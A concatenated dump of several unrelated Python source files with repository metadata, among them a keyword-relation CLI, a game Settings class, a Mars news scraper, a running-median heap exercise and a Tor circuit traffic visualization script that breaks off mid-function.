except Exception:
            print u'Invalid input, it must be an integer!'
def lookup():
    """Look up a keyword and display its relation tree."""
    w0 = prompt(u'Keyword: ')
level = readLevel()
qs = db.query('select w0, w1, count(*) n from relation group by w0, w1')
df = DataFrame(list(qs))
tree = Tree()
tree.create_node(w0, w0)
appendList = []
def append(w0, level=5):
if w0 in appendList or level == 0:
return
appendList.append(w0)
for i, row in df[df['w0'] == w0].iterrows():
w1 = row['w1']
n = row['n']
# print w0, '-->', w1
if w1 not in tree:
title = '%s[%d]' % (w1, n)
tree.create_node(title, w1, parent=w0)
else:
                # cycle detected: this word is already in the tree
title = '%s[%d](*)' % (w1, n)
tree.create_node(title, i, parent=w0)
append(w1, level - 1)
append(w0, level)
tree.show()
def quit():
    """Roll back any pending changes and exit."""
    print u'Goodbye!'
db.rollback()
exit()
def help():
    """Print the list of available commands."""
    print u'star: add relations in a star pattern'
    print u'chain: add relations in a chain'
    print u'commit: save changes'
    print u'rollback: discard changes'
    print u'lookup: look up a keyword'
    print u'quit: exit'
    print u'help: show this help'
commands = {
'star': star,
'chain': chain,
'lookup': lookup,
'commit': commit,
'rollback': rollback,
'quit': quit,
'help': help,
}
def main():
    """Command loop: read a command name and dispatch it."""
    # print the logo
    f = Figlet(font='slant')
    print f.renderText('Mandala')
    # read and execute commands
try:
while True:
cmd = prompt(u'mandala>')
if cmd in commands:
commands[cmd]()
else:
                print u'Invalid command'
except KeyboardInterrupt:
quit()
if __name__ == "__main__":
main()
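# --- Hedged example session (not part of the original file) ---
# A possible interaction, using the prompts translated above; the keyword
# and relation values are invented purely for illustration.
# mandala> star
# Keyword: python
# python --> (1): dataset
#  |-- python --> dataset: +1
# python --> (2):
# mandala> commit
# Saved successfully!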
|
[
"xmduhan@gmail.com"
] |
xmduhan@gmail.com
|
27ddd3555fa9a367607271950e9516a2c79efd64
|
0ae54260b86968dbb2748496629775d03732359c
|
/controller/action.py
|
60f11dd52f310b7f7d927cc3bf4d6fec2c0278ad
|
[
"MIT"
] |
permissive
|
sosterwalder/bti7501p
|
f9593bdf440af25cd40c7f3347e973dd77a0c6b2
|
6da28ac4f6c63205a2b6e8708b01c65fda6c3ce5
|
refs/heads/master
| 2021-01-10T19:56:54.759971
| 2014-06-13T21:28:00
| 2014-06-13T21:28:00
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,647
|
py
|
#!/usr/bin/env python
# action.py module
#
# The MIT License (MIT)
#
# Copyright (c) 2014 Thi Thuy-Duc Dao (daodt1@bfh.ch), Sven Osterwalder (ostes2@bfh.ch)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# System imports
# Project imports
class Action(object):
ACTION_UNDO = 'UNDO'
ACTION_MOVE = 'MOVE'
ACTION_CAPTURE = 'CAPTURE'
def __init__(
self,
action_type,
source,
destination,
captured=None,
):
self.type_ = action_type
self.source = source
self.destination = destination
self.captured = captured
def undo(self):
return Action(
self.ACTION_UNDO,
self.destination,
self.source,
self.captured,
)
def copy(self):
return Action(
self.type_,
self.source,
self.destination,
self.captured,
)
def __len__(self):
return 1
def __eq__(self, other):
if other is None:
return False
if self.type_ != other.type_:
return False
if self.source != other.source:
return False
if self.destination != other.destination:
return False
if self.captured != other.captured:
return False
return True
def __repr__(self):
return self.__str__()
def __str__(self):
return "{0} :: <{1}, {2}> -> <{3}, {4}>".format(
self.type_,
self.source[0],
self.source[1],
self.destination[0],
self.destination[1]
)
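# --- Hedged usage sketch (not part of the original module) ---
# Shows how Action, undo() and copy() are expected to interact; the board
# coordinates below are invented purely for illustration.
if __name__ == '__main__':
    move = Action(Action.ACTION_MOVE, (2, 3), (3, 4))
    print(move)                 # MOVE :: <2, 3> -> <3, 4>
    print(move.undo())          # UNDO :: <3, 4> -> <2, 3>
    assert move == move.copy()  # copies compare equal field by field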
|
[
"sven.osterwalder@gmail.com"
] |
sven.osterwalder@gmail.com
|
67124ec1d96da05dd8371cdfe96260d5600890e8
|
45ffc0be0c6952cd7b503485e5c50fdc619b0601
|
/venv/settings.py
|
a304eab9e003e7a27169e4da389635a7237ab2f6
|
[] |
no_license
|
Quanny02/Alien_invasion
|
8f86854ea445e165b3ed28bd2c042c654c8f0803
|
7d8639bce39faecf2f388652389e51920bf47894
|
refs/heads/master
| 2020-03-16T22:25:06.412758
| 2018-05-29T11:59:55
| 2018-05-29T11:59:55
| 133,038,358
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 506
|
py
|
class Settings():
    """A class to store all settings for Alien Invasion."""
    def __init__(self):
        """Initialize the game's settings."""
        # screen settings
        self.screen_width = 1200
        self.screen_height = 800
        self.bg_color = (230, 230, 230)
        # ship settings
        self.ship_speed_factor = 1.5
        # bullet settings
        self.bullet_speed_facotr = 1
self.bullet_width = 3
self.bullet_height = 15
self.bullet_color = 60, 60, 60
|
[
"james.ellisjr@stu.jefferson.kyschools.us"
] |
james.ellisjr@stu.jefferson.kyschools.us
|
dd1240297f91dad4af698a16309dfc8c8652efa8
|
09fe5ec73326265ccdc05778baa35dd59acb1dd4
|
/Missions_to_Mars/scrape_mars.py
|
0085ecad12f50add3ebbe7c9cf64a8e3faa915b2
|
[] |
no_license
|
Alvin1359/missions-to-mars-webscraping
|
b1b51cad9e2065b3528cf89880c476c4911a995e
|
8880d79db63dda1ab2118ded406ff0c524428e4f
|
refs/heads/main
| 2023-05-27T19:59:19.442287
| 2021-06-14T15:21:59
| 2021-06-14T15:21:59
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,372
|
py
|
import pandas as pd
from splinter import Browser
from bs4 import BeautifulSoup
import time
from webdriver_manager.chrome import ChromeDriverManager
def scrape_info():
# Splinter setup
executable_path = {'executable_path': ChromeDriverManager().install()}
browser = Browser('chrome', **executable_path, headless=False)
# Visit URL
url = ('https://redplanetscience.com/')
browser.visit(url)
html = browser.html
soup = BeautifulSoup(html, 'html.parser')
# Scrape news title
news_title = soup.find_all('div', class_='content_title')[0].text
    # Scrape news paragraph
news_p = soup.find_all('div', class_='article_teaser_body')[0].text
# Visit URL
url = 'https://spaceimages-mars.com/'
browser.visit(url)
html = browser.html
soup = BeautifulSoup(html, 'html.parser')
partial_url = soup.find_all('a',class_="showimg")[0]['href']
featured_image_url = url + partial_url
# Mars Facts table
url = 'https://galaxyfacts-mars.com/'
mars_facts = pd.read_html(url)
mars_facts_df = mars_facts[0]
header_row = 0
mars_facts_df.columns = mars_facts_df.iloc[header_row]
mars_facts_df = mars_facts_df.drop(header_row)
mars_facts_df = mars_facts_df.reset_index(drop=True)
mars_facts_html = mars_facts_df.to_html(index=False, classes="table table-striped table-responsive")
# Visit URL
url = 'https://marshemispheres.com/'
browser.visit(url)
soup = BeautifulSoup(browser.html, 'html.parser')
titles = soup.find_all('h3')[:-1]
title_ls = []
for title in titles:
title_ls.append(title.text)
url_ls = []
for title in title_ls:
url = 'https://marshemispheres.com/'
browser.visit(url)
browser.click_link_by_partial_text(title)
html = browser.html
soup = BeautifulSoup(browser.html, 'html.parser')
image_url = soup.find_all('li')[0].a["href"]
dictionary = {"title": title,"image_url":url + image_url}
url_ls.append(dictionary)
# Store data in a dictionary
mars_data = {
"NewsTitle": news_title,
"NewsPara": news_p,
"FeaturedImg": featured_image_url,
"MarsFacts": mars_facts_html,
"Hemispheres": url_ls,
}
# Close the browser after scraping
browser.quit()
# Return results
return mars_data
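# --- Hedged usage sketch (not part of the original module) ---
# Runs the scraper directly and prints a couple of the collected fields;
# assumes a local Chrome install reachable through webdriver_manager.
if __name__ == '__main__':
    mars_data = scrape_info()
    print(mars_data['NewsTitle'])
    print(mars_data['FeaturedImg'])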
|
[
"alvinjaylucero1@gmail.com"
] |
alvinjaylucero1@gmail.com
|
af0ff074d35191259400a9937db81997e7772ffd
|
d52cb4c2e880875944b14da0b8a9542235942ac8
|
/geeksforgeeks/heap/6_Find_median_in_stream.py
|
521a8f79468f59a0c175f5766c7681ae8d0a619c
|
[] |
no_license
|
saparia-data/data_structure
|
fbd61535b68f92143b2cb2679377c0f56f424670
|
2e8700cfdaeefe0093e5b4fb2704b1abcd300d02
|
refs/heads/master
| 2023-05-08T18:54:52.250941
| 2021-06-04T05:44:29
| 2021-06-04T05:44:29
| 296,071,146
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,382
|
py
|
'''
Given an input stream of N integers.
The task is to insert these numbers into a new stream and find the median of the stream formed by each insertion of X to the new stream.
Example 1:
Input:
N = 4
X[] = 5,15,1,3
Output:
5
10
5
4
Explanation: Flow in stream: 5, 15, 1, 3
5 goes to stream --> median 5 (5)
15 goes to stream --> median 10 (5,15)
1 goes to stream --> median 5 (5,15,1)
3 goes to stream --> median 4 (5,15,1,3)
'''
import heapq
min_heap = []
max_heap = []
def balanceHeaps():
'''
use globals min_heap and max_heap, as per declared in driver code
use heapify modules , already imported by driver code
Balance the two heaps size , such that difference is not more than one.
'''
if abs(len(min_heap)-len(max_heap)) <= 1:
return # already balanced
# take out one element from top of heap with greater size, and push in other heap
if len(min_heap)>len(max_heap): # min_heap has more data
value_top = heapq.heappop(min_heap)
# push in max heap, using negative as it is implemented on min heap
heapq.heappush(max_heap,-1*value_top) # value inserted in max heap
else:
# take from max heap and insert in min heap
value_top = -1* heapq.heappop(max_heap) # negate it to get original value
heapq.heappush(min_heap,value_top) # insert value in min heap
return
def getMedian():
'''
use globals min_heap and max_heap, as per declared in driver code
use heapify modules , already imported by driver code
:return: return the median of the data received till now.
'''
# cases with odd number of elements in data
if len(max_heap)>len(min_heap):
# return the element from top of max_heap
value = heapq.heappop(max_heap)
heapq.heappush(max_heap,value) # push element back in max heap
return (-1*value)
elif len(min_heap)>len(max_heap):
# return the top element from min heap
value = heapq.heappop(min_heap)
heapq.heappush(min_heap,value)
return value
else:
# the number of elements is even in data, return the average of the two values
val_min = heapq.heappop(min_heap)
val_max = -1*heapq.heappop(max_heap)
# push these values back in the heap
heapq.heappush(min_heap,val_min)
heapq.heappush(max_heap,-1*val_max)
return ((val_max+val_min)//2) # return the average of the two
def insertHeaps(x):
'''
use globals min_heap and max_heap, as per declared in driver code
use heapify modules , already imported by driver code
:param x: value to be inserted
:return: None
'''
# if top of min heap is less than x, x belongs in upper half
least_upperhalf = heapq.heappop(min_heap) if len(min_heap) else -1 # minimum element of upper half or -1 if empty
# if popped, push in min_heap again
if least_upperhalf!=-1:
heapq.heappush(min_heap,least_upperhalf)
if x >= least_upperhalf :
heapq.heappush(min_heap,x) # insert in min_heap
else:
# x belongs in lower half
# as this is a max_heap implemented on heapq, hence negative of x will be inserted to maintain
# max heap property.
heapq.heappush(max_heap,-1*x)
arr = [5,15,1,3]
n = len(arr)
for i in range(n):
insertHeaps(arr[i])
balanceHeaps()
print(getMedian())
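# --- Hedged cross-check (not part of the original solution) ---
# Recomputes each running median with a naive sort to confirm the two-heap
# answers above (integer division matches getMedian's even-length case).
seen = []
for x in arr:
    seen.append(x)
    s = sorted(seen)
    mid = len(s) // 2
    naive = s[mid] if len(s) % 2 else (s[mid - 1] + s[mid]) // 2
    print(naive)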
|
[
"saparia.ashvin@tavant.com"
] |
saparia.ashvin@tavant.com
|
0f02c8e716a5430048e7a6238850eacba01fa71a
|
f9c1c3523905e511d206187321b53ad39bbe5751
|
/import.py
|
9ddd2be3508219ec3a8d5a6575fac8ef8d1b9dcd
|
[] |
no_license
|
amrrsharaff/daisy-hacks
|
4f5acc0313a8740633a65ce6086649ddb720b35e
|
c69c5fb287c62b90981acdf8ae366efca14acb84
|
refs/heads/master
| 2021-05-09T02:23:34.629595
| 2018-02-05T23:11:08
| 2018-02-05T23:11:08
| 119,207,392
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,358
|
py
|
import tensorflow as tf
import csv
import pandas
# Metadata describing the text columns
COLUMNS = ['date_', 'store',
'department', 'item',
'unit_price','on_promotion', 'promotion_type', 'quantity']
FIELD_DEFAULTS = [[0.0], [0.0], [0.0], [0.0], [0], [0], [0], [0]]
def _parse_line(line):
# Decode the line into its fields
fields = tf.decode_csv(line, FIELD_DEFAULTS)
# Pack the result into a dictionary
features = dict(zip(COLUMNS,fields))
# Separate the label from the features
label = features.pop('quantity')
print(line)
#print(features)
return features, label
def train_input_fn(features, labels, batch_size):
"""An input function for training"""
# Convert the inputs to a Dataset.
dataset = tf.data.Dataset.from_tensor_slices((dict(features), labels))
# Shuffle, repeat, and batch the examples.
dataset = dataset.shuffle(1000).repeat().batch(batch_size)
# Build the Iterator, and return the read end of the pipeline.
return dataset.make_one_shot_iterator().get_next()
if __name__ == "__main__":
# All the inputs are numeric
dataframe = pandas.read_csv('/Users/ASharaf/Desktop/hackathon_data/trial.csv', header=0)
features = pandas.read_csv('/Users/ASharaf/Desktop/hackathon_data/trial.csv', header=0)
label = features.pop('quantity')
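    # --- Hedged usage sketch (not part of the original script) ---
    # Wires the loaded DataFrame into the input function defined above; the
    # batch size of 32 is arbitrary and the columns are assumed to already be
    # numeric (non-numeric columns would need encoding first).
    next_batch = train_input_fn(features, label, batch_size=32)
    print(next_batch)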
|
[
"noreply@github.com"
] |
amrrsharaff.noreply@github.com
|
dd8e7febbbd200e6c38975d76ce0e0646f3d7a4f
|
d5ef8f9ba3fc9a3af95c9c480eca3453606ed2d2
|
/isup_parameters/RedirectingNumberFlag.py
|
cde06ec3cad46959bfcbcc871df73e9314bef8a2
|
[] |
no_license
|
sureshrasa/isupds
|
ab0b643dc64923b55b679e2a19b88b7b11ab1c6b
|
cc4bb976dfcdd30719766051485956dfb6da169a
|
refs/heads/master
| 2020-03-21T15:27:08.613505
| 2018-06-26T09:57:21
| 2018-06-26T09:57:21
| 138,713,217
| 0
| 0
| null | null | null | null |
WINDOWS-1252
|
Python
| false
| false
| 473
|
py
|
#
# Author(s): Suresh Rasakulasuriar
#
# Copyright: © Resilientplc.com Ltd. 2018 - All Rights Reserved
#
from enum import IntEnum, unique
@unique
class RedirectingNumberFlag(IntEnum):
OddAddressSignals = 0
UNRECOGNISED = 0xFFFF
class RedirectingNumberFlagDict:
_dict = {
0 : RedirectingNumberFlag.OddAddressSignals }
@staticmethod
def lookup(ordinal):
return RedirectingNumberFlagDict._dict.get(ordinal, ordinal)
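# --- Hedged usage sketch (not part of the original module) ---
# lookup() maps a known ordinal to its enum member and passes unknown
# ordinals through unchanged.
if __name__ == '__main__':
    print(RedirectingNumberFlagDict.lookup(0))  # RedirectingNumberFlag.OddAddressSignals
    print(RedirectingNumberFlagDict.lookup(7))  # 7 (unrecognised, returned as-is)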
|
[
"suresh@suriar.me.uk"
] |
suresh@suriar.me.uk
|
80ba85293b15a3a17058013b70da20e139f12445
|
bd69b2c0737b25344f40d34870ebe59a70dde19f
|
/exploratory.py
|
a224cefb2e6de87f3001f0e667dff62a0b75eb39
|
[] |
no_license
|
shalisap/thesis-code
|
0e15a9014cbfdc61d40ce39c87422e507ca3f491
|
049aa1b469f6ccf02d7c6b2f3c7724d17656b7cc
|
refs/heads/master
| 2021-05-28T23:15:37.173771
| 2015-04-30T16:41:26
| 2015-04-30T16:41:26
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 18,086
|
py
|
"""
Create visualizations for time series data from parsed, windowed log files.
Supports horizon plots and color plots for random samples, histogram of
distribution characteristics, and single series time plots.
Syntax: python exploratory.py -summarize logfile.pickle
python exploratory.py -horizon logfile.pickle rand_seed
python exploratory.py -colorplots logfile.pickle rand_seed
python exploratory.py -timeplot logfile.pickle ts_ident
rand_seed determines which 1000 series random sample is taken from the record set.
ts_ident is the identifier of the single series to view, in the
format 'circ_id,ip_slug'.
@author: Julian Applebaum
@author: Shalisa Pattarawuttiwong
Last Edited: 08/04/14
-modified doTimeplot to plot multiple line graphs
"""
from scipy.stats import skew, pearsonr
from numpy import mean, std, median, linspace, correlate
from matplotlib.colors import LinearSegmentedColormap, ListedColormap
from matplotlib.patches import Rectangle
from sklearn.cluster import k_means
from pprint import pprint
from math import sqrt
from sequence_utils import trim_inactive_preprocess, flatten
import matplotlib.pyplot as plt
from matplotlib import cm
import pylab
import sys, cPickle, subprocess, random
from glob import glob
N_HIST_BINS = 100
N_CLUSTERS = 6
VMAX = 700
MAX_OBS = 1500
artist_ident_map = {}
def draw_sample(data, n=1000):
"""
Draw a random sample from a list
@param data: the list
@param n: the size of the sample
@return: a size n random sample of data
"""
random.shuffle(data)
return data[:n]
def on_pick(event):
"""
Pull up the time plot for a series when the user clicks on it.
@param event: The picking event fired by the click
"""
ident = artist_ident_map[event.artist]
print "Loading time series for circuit %s" % ident
	bash_call = "python exploratory.py -timeplot %s 1000 %i,%i" % (inpath,
		ident[0], ident[1])
subprocess.call(bash_call, shell=True)
def autocorrelate(series, lag=1):
"""
Perform Pearson autocorrelation on a time series
@param series: the time series
@param lag: the lag
@return: the autocorrelation coefficient
"""
shifted = series[0:len(series)-1-lag]
series_cutoff = series[lag:len(series)-1]
return pearsonr(series_cutoff, shifted)[0]
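# --- Hedged illustration (not part of the original module) ---
# For a strictly increasing series the lag-1 autocorrelation is 1.0, e.g.
# autocorrelate([1, 2, 3, 4, 5, 6], lag=1) compares [2, 3, 4, 5] with
# [1, 2, 3, 4] and returns a Pearson coefficient of 1.0.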
def acorr_plot(series, ax):
"""
Generate a correlogram for a series for all possible lag values.
@param series: the time series
@param ax: the axes object to draw the plot on
"""
corrs = []
for i in xrange(1, len(series)-1):
corrs.append(autocorrelate(series, i))
plt.title("Correlogram")
plt.xlabel("Lag")
plt.ylabel("Pearson Correlation")
ax.bar(range(1, len(corrs)+1), corrs, width=1)
plt.ylim([-1, 1])
def summarize(values, name):
"""
Print out summary stats for a list of values
@param values: The values to summarize
@param name: The name to display in the printed text
"""
border_len = len(name) + 8
print "*" * border_len
print "***", name, "***"
print "Mean:", mean(values)
print "Min:", min(values)
print "Max:" , max(values)
print "Std Dev:", std(values)
print "*" * border_len, "\n"
def discretize(relay_series, k=N_CLUSTERS):
"""
Cluster the observations in relay_series into k bins, and replace each
observation with its cluster label.
@param relay_series: the list of series to discretize
@param k: the number of clusters to create
@return: (relay_series, cluster_ranges). relay_series is the list of
discretized series. cluster_ranges is a list of cluster mins and maxs
in s.t. cluster_ranges[i] = (min(cluster_i), max(cluster_i))
"""
cluster_maxes = [0 for i in xrange(0, k)]
cluster_mins = [float("inf") for i in xrange(0, k)]
all_window_counts = reduce(list.__add__, relay_series, [])
	vectorized = [[o] for o in all_window_counts]
	# reconstructed step (assumption): cluster the window counts with k-means
	# from sklearn (imported above) to obtain the per-observation labels
	_, labels, _ = k_means(vectorized, k)
idx = 0
for series in relay_series:
for i in xrange(0, len(series)):
label = labels[idx]
cluster_maxes[label] = max(cluster_maxes[label], series[i])
cluster_mins[label] = min(cluster_mins[label], series[i])
series[i] = label
idx += 1
cluster_ranges = zip(sorted(cluster_mins), sorted(cluster_maxes))
return (relay_series, cluster_ranges)
def do_summarize(records):
"""
Display summary histograms for the series in records.
@param records: the circuit records
"""
circ_len_aggr = []
in_mean_cells_per_window_aggr = []
in_min_cells_per_window_aggr = []
in_max_cells_per_window_aggr = []
in_median_cells_per_window_aggr = []
in_stddev_cells_per_window_aggr = []
in_inst_counts_aggr = []
#unique_vals_aggr = []
percent_active_aggr = []
time_active_aggr = []
out_mean_cells_per_window_aggr = []
out_min_cells_per_window_aggr = []
out_max_cells_per_window_aggr = []
out_median_cells_per_window_aggr = []
out_stddev_cells_per_window_aggr = []
out_inst_counts_aggr = []
for record in records:
relays = record['relays']
in_relays = [r[0] for r in relays]
out_relays = [r[1] for r in relays]
circ_len_aggr.append((record['destroy'] - record['create'])/1000.0)
in_mean_cells_per_window_aggr.append(1.0*sum(in_relays)/len(in_relays))
out_mean_cells_per_window_aggr.append(1.0*sum(out_relays)/len(out_relays))
in_median_cells_per_window_aggr.append(median(in_relays))
out_median_cells_per_window_aggr.append(median(out_relays))
in_min_cells_per_window_aggr.append(min(in_relays))
out_min_cells_per_window_aggr.append(min(out_relays))
in_max_cells_per_window_aggr.append(max(in_relays))
out_max_cells_per_window_aggr.append(max(out_relays))
in_stddev_cells_per_window_aggr.append(std(in_relays))
out_stddev_cells_per_window_aggr.append(std(out_relays))
in_inst_counts_aggr += in_relays
out_inst_counts_aggr += out_relays
# unique_vals_aggr.append(len(set(filter(lambda o: o > 2, relays))))
time_active = len(trim_inactive_preprocess(relays))
percent_active_aggr.append(100.0*time_active/len(relays))
# time_active_aggr.append(time_active)
fig = plt.figure()
summarize(in_max_cells_per_window_aggr, "Max IN")
summarize(out_max_cells_per_window_aggr, "Max OUT")
meansplot = fig.add_subplot(421)
plt.title("Mean Cells/Window")
plt.xlabel("Mean Cells/Window")
plt.ylabel("Frequency")
plt.yscale('log')
meansplot.hist(in_mean_cells_per_window_aggr, bins=N_HIST_BINS, alpha=0.5, label='in')
meansplot.hist(out_mean_cells_per_window_aggr, bins=N_HIST_BINS, alpha=0.5, label='out')
cellsplot = fig.add_subplot(422)
plt.title("Median Cells/Window")
plt.xlabel("Median Cells/Window")
plt.ylabel("Frequency")
plt.yscale('log')
cellsplot.hist(in_median_cells_per_window_aggr, bins=N_HIST_BINS, alpha=0.5, label='in')
cellsplot.hist(out_median_cells_per_window_aggr, bins=N_HIST_BINS, alpha=0.5, label='out')
minsplot = fig.add_subplot(423)
plt.title("Min Cells/Window")
plt.xlabel("Min Cells/Window")
plt.ylabel("Frequency")
plt.yscale('log')
minsplot.hist(in_min_cells_per_window_aggr, bins=N_HIST_BINS, alpha=0.5, label='in')
minsplot.hist(out_min_cells_per_window_aggr, bins=N_HIST_BINS, alpha=0.5, label='out')
maxsplot = fig.add_subplot(424)
plt.title("Max Cells/Window")
plt.xlabel("Max Cells/Window")
plt.ylabel("Frequency")
plt.yscale('log')
maxsplot.hist(in_max_cells_per_window_aggr, bins=N_HIST_BINS, alpha=0.5, label="in")
maxsplot.hist(out_max_cells_per_window_aggr, bins=N_HIST_BINS, alpha=0.5, label="out")
stddevsplot = fig.add_subplot(425)
plt.title("Std Dev. of Cells/Window")
plt.xlabel("Std Dev. of Cells/Window")
plt.ylabel("Frequency")
plt.yscale('log')
stddevsplot.hist(in_stddev_cells_per_window_aggr, bins=N_HIST_BINS, alpha=0.5, label='in')
stddevsplot.hist(out_stddev_cells_per_window_aggr, bins=N_HIST_BINS, alpha=0.5, label='out')
cellsplot = fig.add_subplot(426)
plt.title("Single Window Cell Count")
plt.xlabel("Single Window Cell Count")
plt.ylabel("Frequency")
plt.yscale('log')
cellsplot.hist(in_inst_counts_aggr, bins=N_HIST_BINS, alpha=0.5, label='in')
cellsplot.hist(out_inst_counts_aggr, bins=N_HIST_BINS, alpha=0.5, label='out')
lenplot = fig.add_subplot(427)
plt.title("Circuit Length (seconds)")
plt.xlabel("Circuit Length (seconds)")
plt.ylabel("Frequency")
plt.yscale('log')
lenplot.hist(circ_len_aggr, bins=N_HIST_BINS)
# uniqueplot = fig.add_subplot(338)
# plt.title("Number of Unique Values > 1")
# plt.xlabel("Number of Unique Values > 1")
# plt.ylabel("Frequency")
# uniqueplot.hist(unique_vals_aggr, bins=N_HIST_BINS)
# timeactiveplot = fig.add_subplot(428)
# plt.title("Percent of Time in Active State")
# plt.xlabel("Percent of Time")
# plt.ylabel("Frequency")
# timeactiveplot.hist(percent_active_aggr, bins=N_HIST_BINS)
fig.tight_layout()
def do_horizon(records, window_size, ylim=None):
"""
Display a horizon plot for a size 1000 random sample of records
@param records: the circuit records
@param window_size: the size of the cell count windows
"""
sample = draw_sample(records)
fig = plt.figure()
fig.canvas.mpl_connect('pick_event', on_pick)
ax = fig.add_subplot(2,2,1)
plt.title("Inbound Horizon Plot (n=%i)" % len(sample))
plt.xlabel("Window # (%i ms windows)" % window_size)
plt.ylabel("Ingoing Relay Cells/Window")
plt.grid(True)
for record in sample:
s = record['relays']
series = [i[0] for i in s]
# use fill_between to avoid some rendering bugs
artist = ax.fill_between(range(0, len(series)), series, [0]*len(series),
alpha=.2, color='black', edgecolor='none', picker=True)
artist_ident_map[record['ident']] = artist
ay = fig.add_subplot(2,2,3)
plt.title("Outbound Horizon Plot (n=%i)" % len(sample))
plt.xlabel("Window # (%i ms windows)" % window_size)
plt.ylabel("Outgoing Relay Cells/Window")
plt.grid(True)
for record in sample:
s = record['relays']
series = [i[1] for i in s]
# use fill_between to avoid some rendering bugs
artist = ay.fill_between(range(0, len(series)), series, [0]*len(series),
alpha=.2, color='black', edgecolor='none', picker=True)
artist_ident_map[record['ident']] = artist
fig.tight_layout()
if ylim is not None:
pylab.ylim([0, ylim])
def do_timeplot(records, window_size, ts_ident_list):
"""
Display a time plot and a correlogram for multiple time series
@param records: the list of circuits records containing the series
@param window_size: the size of the cell count windows
@param ts_ident: the list of [(circ_id, ip_slug)]
tuples identifying the series
"""
subplot_size = 421
fig = plt.figure()
# have to do this once first to be able to scale the subplots to the same scale
rstr, cstr, ipstr = ts_ident_list[0].split(",")
rstr = rstr.replace("(", "")
cstr = cstr.replace(")", "")
fig.canvas.set_window_title("%s-%i-%i-%i" % (rstr, int(cstr),
int(ipstr), window_size))
timeplot = fig.add_subplot(subplot_size)
for record in records:
if record['ident'] == ((rstr, int(cstr)), int(ipstr)):
s = record['relays']
in_series = [i[0] for i in s]
out_series = [i[1] for i in s]
plt.plot(in_series)
plt.plot(out_series)
subplot_size += 1
for ident in ts_ident_list[1:]:
rstr, cstr, ipstr = ident.split(",")
rstr = rstr.replace("(","")
cstr = cstr.replace(")","")
fig.canvas.set_window_title("%s-%i-%i-%i" % (rstr, int(cstr), int(ipstr), window_size))
timeplot1 = fig.add_subplot(subplot_size, sharex=timeplot, sharey=timeplot)
# acorrplot = fig.add_subplot(122)
for record in records:
if record['ident'] == ((rstr, int(cstr)), int(ipstr)):
plt.xlabel("Window # (%i ms windows)" % window_size)
plt.ylabel("Ingoing Relay Cell Count")
s = record['relays']
in_series = [i[0] for i in s]
# line graphs
plt.plot(in_series)
plt.xlabel("Window # (%i ms windows)" % window_size)
plt.ylabel("Outgoing Relay Cell Count")
out_series = [i[1] for i in s]
# line graphs
plt.plot(out_series)
# timeplot.fill_between(range(0, len(series)), series, [0]*len(series),
# color='grey')
# acorr_plot(series, acorrplot)
subplot_size += 1
fig.text(0.5, 0.04, 'Window # (%i ms windows)'% window_size, ha='center', va='center')
fig.text(0.06, 0.5, 'Outgoing Relay Cell Count', ha='center', va='center', rotation='vertical')
# outbound only
def do_colorplot(records, window_size, ax=None, ay=None, no_chrome=False,
sample_size=1000):
"""
Display a color plots for a size 1000 random sample of records
@param records: the circuit records
@param window_size: the size of the cell count windows
"""
def rec_cmp(rec_1, rec_2):
relays_1, relays_2 = rec_1['relays'], rec_2['relays']
m_r1, m_r2= ((mean([i[0] for i in relays_1]) +
mean([i[1] for i in relays_1])),
(mean([i[0] for i in relays_2]) +
mean([i[1] for i in relays_2])))
if len(relays_1) == len(relays_2):
if m_r1 == m_r2: return 0
elif m_r1 > m_r2: return 1
else: return -1
elif len(relays_1) > len(relays_2):
return 1
else:
return -1
sample = draw_sample(records, sample_size)
sample.sort(cmp=rec_cmp)
N_CLUSTERS = 6
colors =[(1.0*i/N_CLUSTERS,)*3 for i in xrange(1, N_CLUSTERS+1)]
cmap = ListedColormap(colors)
relay_series = [record['relays'] for record in sample]
out_relay_series = []
for r in relay_series:
newTupOut = []
for tup in r:
newTupOut.append(tup[1])
out_relay_series.append(newTupOut)
vmin = 0
vmax = VMAX
if ax is None:
fig = plt.figure()
fig.canvas.mpl_connect('pick_event', on_pick)
ax = fig.add_subplot(111)
ax.get_yaxis().set_ticks([])
if not no_chrome:
plt.title("Outbound Luminance Plot (n=%i)" % len(sample))
plt.xlabel("Window # (%i ms windows)" % window_size)
plt.ylabel("Client")
# legend_rects = [Rectangle((0, 0), 1, 1, fc=c) for c in reversed(colors)]
# legend_labels = ["%i-%i cells" % c for c in reversed(cluster_ranges)]
# plt.legend(legend_rects, legend_labels, loc=4)
n = 0
for i in xrange(0, len(sample)):
series = out_relay_series[i]
ident = sample[i]['ident']
artist = ax.scatter(range(0, len(series)), [n]*len(series),
c=series, marker="s", edgecolors='none', vmin=vmin, vmax=40,
cmap=cm.gray, picker=True)
n += 2
artist_ident_map[ident] = artist
if not no_chrome:
fig.colorbar(artist)
# inbound and outbound
def do_colorplot_both(records, window_size, ax=None, ay=None, no_chrome=False,
sample_size=1000):
"""
Display a color plots for a size 1000 random sample of records
@param records: the circuit records
@param window_size: the size of the cell count windows
"""
def rec_cmp(rec_1, rec_2):
relays_1, relays_2 = rec_1['relays'], rec_2['relays']
m_r1, m_r2= ((mean([i[0] for i in relays_1]) +
mean([i[1] for i in relays_1])),
(mean([i[0] for i in relays_2]) +
mean([i[1] for i in relays_2])))
if len(relays_1) == len(relays_2):
if m_r1 == m_r2: return 0
